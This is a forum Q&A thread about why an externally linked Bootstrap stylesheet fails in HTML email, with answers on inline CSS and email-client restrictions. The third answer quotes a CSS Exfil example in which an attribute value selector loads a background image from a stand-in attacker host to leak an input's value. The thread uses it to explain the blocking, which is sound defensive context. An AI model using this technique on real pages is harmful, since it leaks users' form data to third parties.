Twitter Bootstrap Question posted in

How to link external CSS in html format at Email Body?Here I am not using twitter bootstrap?

I have Done a Html format Email system…
So over there I can able to send email In html format..With internal CSS

Now I have done same with external bootstrap CSS..

over there CSS is missing. Hence I am using an External bootstrap css
this is my external css link

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

However external bootstrap CSS is loading when I run it as an Html page.

But its not working In Email

Please suggest me regarding this..

Tags:

3

Answers


  1. 0
    1. First thing is you cannot link external CSS from a CDN or anyplace.
    2. But you can Insert images from outside
    3. you have to write you CSS rules inline html.
    4. And you cannot use divisions(divs)in you email template html code.
    5. You have to make the template’s structure with html tables.

    For more email template guidelines : http://earthintegrate.com/guidelines-for-creating-an-html-email-template/

    Good Luck !

    Srivin Prabhash

    Login or Signup to reply.
  2. 0

    Gmail will strip everything in the <head>, that’s just how they made it.

    What you can do is to use a service like mailchips inline-css generator, to make all of the inline codes for you.

    Login or Signup to reply.
  3. 0

    The reason for blocking external CSS is that it provides the same tracking ability that tracking pixels do – a given email is requesting data from a remote server in order to be able to render the page. Thus, no reasonable email client is going to allow you an uncontrolled CSS external link.

    This abuse of CSS can be taken to the length of a complete CSS Keylogger which was discussed at length in Mike Gualtieri’s post.

    Quoting Mike:

    The CSS Exfil attack centers around the CSS ‘value selectors’, which can be used to parse HTML tag attribute data.

    This simple example demonstrates how these selectors can be abused:

    <style>
    #username[value="mikeg"] {
            background:url("https://attacker.host/mikeg");
    }
</style>
<input id="username" value="mikeg" />

    In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded on a remote host controlled by the attacker, indicating the value of the input is ‘mikeg’. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks.

    As mentioned in this Hacker news thread, it is prudent to leave password inputs completely uncontrolled, i.e. let the browser do its normal thing for updating the DOM based on user input.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search